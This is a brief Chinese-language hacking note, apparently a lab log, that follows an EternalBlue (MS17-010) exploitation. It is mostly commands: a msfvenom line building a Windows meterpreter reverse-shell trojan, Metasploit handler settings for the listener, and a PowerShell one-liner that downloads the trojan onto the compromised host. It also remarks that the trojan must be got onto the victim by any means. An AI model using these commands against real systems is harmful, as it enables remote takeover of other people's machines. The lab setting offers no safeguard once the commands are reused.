刚刚试了下永恒之蓝,看到有人用木马,也补一下后面的其他
环境和那一片的一样
- msfvenom模块,首先生成.exe木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.77.0.109 lport=4443f exe >/root/1.exe
1.exe 就是木马 要把这个用各种方法去受害机运行
2. 输入msfconsole进入metasploi
3. 进入监听模块
use exploit/multi/handler
- 设置payload反弹
set payload windows/meterpreter/reverse_tcp
- 设置监听ip端口
set lhost 10.77.0.109
set lport 4443
要与木马一致
- 运行
kali这边就准备完了,等待上线
在目标主机运行 1.exe 木马
利用是之前的ms17010直接shell
powershell (new-object System.Net.WebClient).DownloadFile( 'http://10.77.0.100/1.exe','c:\1.exe')
上线成功
后续的。。再写